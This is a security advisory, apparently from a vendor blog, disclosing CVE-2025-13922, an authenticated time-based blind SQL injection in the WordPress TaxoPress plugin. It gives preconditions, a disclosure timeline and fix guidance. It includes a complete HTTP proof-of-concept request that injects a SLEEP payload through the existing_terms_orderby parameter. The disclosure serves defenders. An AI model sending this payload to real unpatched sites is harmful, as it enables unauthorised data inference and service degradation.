CVE-2025-13922 is an authenticated, time-based blind SQL injection affecting the WordPress plugin TaxoPress (plugin slug simple-tags). The issue sits in the TaxoPress AI preview feature and is triggered through an AJAX workflow, allowing a logged-in user with Contributor-level access (or higher) and AI metabox permissions to inject SQL into an ORDER BY clause, commonly demonstrated with delay payloads such as SLEEP() for observable timing impact. According to National Vulnerability Database, the vulnerable parameter is existing_terms_orderby, and the issue affects all versions up to and including 3.40.1. The plugin’s deployment footprint is significant—WordPress.org reports 50,000+ active installations—so even a “PR:L” authenticated SQLi matters in the real world where Contributor/Author accounts are common in editorial sites.
| CVE | CVE-2025-13922 |
| Plugin Version | Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI <= 3.40.1 |
| Critical | High |
| All Time | 5 777 010 |
| Active installations | 50 000+ |
| Publicly Published | December 5, 2025 |
| Last Updated | December 5, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13922 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-tags/tag-category-and-taxonomy-manager-ai-autotagger-with-openai-3401-authenticated-contributor-sql-injection-via-order-by-clause |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| November 24, 2025 | Plugin testing and vulnerability detection in the Tag, Category, and Taxonomy Manager – AI Autotagger with OpenAI have been completed |
| November 24, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| December 5, 2025 | Registered CVE-2025-13922 |
Discovery of the Vulnerability
The vulnerability is a classic “dynamic SQL fragment” problem: the code path building the taxonomy term query interpolates raw ordering fragments (notably ORDER BY components) derived from user input, without a strict allow-list for permitted columns or direction tokens. The CVE description explicitly ties the flaw to insufficient escaping and lack of parameterization, enabling attackers to append SQL into existing queries and perform time-based inference or cause performance degradation. Wordfence’s record aligns with the same mechanism (time-based blind SQLi via existing_terms_orderby in the AI preview AJAX endpoint) and confirms the practical fix guidance: update to 3.41.0 or newer.
Understanding of SQL Injection attack’s
This bug is not “unauthenticated SQLi”. It is authenticated and gated by how the AI preview handler is invoked. The NVD entry notes the attacker must be authenticated with Contributor-level access (or higher) and have AI metabox permissions. In your code-level notes, there is an additional operational precondition that matters for reliable reproduction: the preview handler rejects requests unless it has post context, so you must supply preview_post=<existing_post_id> or provide non-empty post_title/post_content, otherwise it short-circuits with an error such as {"status":"error","content":"Posts content and title is empty."} before the vulnerable SQL path is reached. That “must-have context” requirement doesn’t reduce severity much in real deployments (contributors can usually reference at least one accessible post ID), but it is critical for a clean PoC and for developers verifying the fix.
Exploiting the SQL Injection Vulnerability
To exploit CVE-2025-13922, an attacker with Contributor+ cookies:
POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=st_posts X-Requested-With: XMLHttpRequest Origin: http://127.0.0.1 Connection: keep-alive Cookie: Contributor+_cookies Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Content-Type: application/x-www-form-urlencoded Content-Length: 171 action=taxopress_ai_preview_feature&nonce=st_admin_localize.ai_nonce_from_profile.php&preview_ai=existing_terms&preview_taxonomy=post_tag&preview_post=1&existing_terms_orderby=(SELECT+SLEEP(7))&existing_terms_order=ASC____
Even though this is “ORDER BY injection,” the security implications are still meaningful. Time-based blind SQLi can enable data inference (extracting information bit-by-bit via timing), can degrade database performance under repeated requests, and can amplify into a reliability and availability issue on busy sites if exploited at scale. The fact that the attacker is authenticated reduces the blast radius to sites with untrusted or semi-trusted contributors, but that’s exactly the profile of many publishing and multi-author WordPress installations. Additionally, because the injection is in a backend feature (AI preview/metabox), it is easy for defenders to miss during routine perimeter testing, yet it can still be reached by low-privileged accounts that are frequently created for collaboration or content submission.
Recommendations for Improved Security
The right fix is not “more sanitization,” but strict allow-listing and safe query construction. For any ORDER BYconstruction, the code should map user input to a finite set of permitted columns (e.g., name, count, term_id, etc.) and enforce direction as either ASC or DESC, rejecting everything else. If the logic must support multiple order keys, it should assemble them from validated tokens only, never from raw strings. Beyond that, upgrading to a patched release is the cleanest mitigation path; Wordfence indicates this issue is patched and recommends updating to TaxoPress 3.41.0 or newer. On the operational side, treat “AI metabox access” as a privileged feature: restrict it to trusted roles, and review which roles are granted those permissions in editorial environments where contributor accounts might be numerous.
By taking proactive measures to address SQL Injection vulnerabilities like CVE-2025-13922 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #SQLi #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.